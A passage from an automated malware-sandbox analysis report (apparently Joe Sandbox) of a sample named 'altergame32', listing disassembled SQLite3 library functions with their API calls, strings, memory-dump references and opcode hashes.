                                                                  • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                    • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                  • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                    • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                    • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                    • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                  • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                  • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                  • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                  • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                  • String ID: optimize
                                                                  • API String ID: 3659050757-3797040228
                                                                  • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                  • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                  • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                  • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                  Function 6096544A Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                  • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                  • sqlite3_reset.SQLITE3 ref: 60965556
                                                                  • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                    • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                    • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                  • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                  • sqlite3_free.SQLITE3 ref: 60965714
                                                                  • sqlite3_free.SQLITE3 ref: 6096574B
                                                                    • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                  • sqlite3_free.SQLITE3 ref: 609657AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                  • String ID:
                                                                  • API String ID: 2722129401-0
                                                                  • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                  • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                  • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                  • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                  Function 609644FC Relevance: 12.2, APIs: 8, Instructions: 204COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                    • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                  • sqlite3_free.SQLITE3 ref: 609647C5
                                                                    • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                  • sqlite3_free.SQLITE3 ref: 6096476B
                                                                    • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                  • sqlite3_free.SQLITE3 ref: 6096477B
                                                                  • sqlite3_free.SQLITE3 ref: 60964783
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                  • String ID:
                                                                  • API String ID: 571598680-0
                                                                  • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                  • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                  • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                  • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                  Function 609634F0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                    • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                  • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                  • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                  • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                  • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                  • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                  • sqlite3_free.SQLITE3 ref: 60963621
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                  • String ID:
                                                                  • API String ID: 4276469440-0
                                                                  • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                  • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                  • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                  • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                  Function 6091A226 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                  Strings
                                                                  • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                  • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                  • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                  • API String ID: 4080917175-264706735
                                                                  • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                  • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                  • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                  • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                  Function 609250BB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                  • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                  • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                  • String ID: library routine called out of sequence$out of memory
                                                                  • API String ID: 2019783549-3029887290
                                                                  • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                  • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                  • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                  • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                  Function 60947378 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 292COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                    • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                  • sqlite3_log.SQLITE3 ref: 609498F5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                  • String ID: List of tree roots: $d$|
                                                                  • API String ID: 3709608969-1164703836
                                                                  • Opcode ID: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                                  • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                  • Opcode Fuzzy Hash: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                                  • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                  Function 60960052 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 196COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                    • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                    • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                    • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                  • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                  • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                  • sqlite3_free.SQLITE3 ref: 6096029A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                  • String ID: e
                                                                  • API String ID: 786425071-4024072794
                                                                  • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                  • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                  • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                  • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                  Function 609470DE Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_exec
                                                                  • String ID: sqlite_master$sqlite_temp_master$|
                                                                  • API String ID: 2141490097-2247242311
                                                                  • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                  • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                  • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                  • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                  Function 6094B137 Relevance: 7.7, APIs: 5, Instructions: 204COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                  • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                  • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                  • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                  • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                    • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                    • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                    • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                    • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                  • String ID:
                                                                  • API String ID: 683514883-0
                                                                  • Opcode ID: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                                  • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                  • Opcode Fuzzy Hash: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                                  • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                  Function 6093A1DD Relevance: 7.7, APIs: 5, Instructions: 157COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                  • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                  • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                  • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                    • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                    • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                    • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                    • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                    • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                  • String ID:
                                                                  • API String ID: 1903298374-0
                                                                  • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                  • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                  • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                  • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                  Function 6093A0C5 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                  • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                  • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                  • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                  • String ID:
                                                                  • API String ID: 1894464702-0
                                                                  • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                  • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                  • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                  • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                  Function 6092535E Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                  • sqlite3_log.SQLITE3 ref: 609253E2
                                                                  • sqlite3_log.SQLITE3 ref: 60925406
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                  • String ID:
                                                                  • API String ID: 3336957480-0
                                                                  • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                  • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
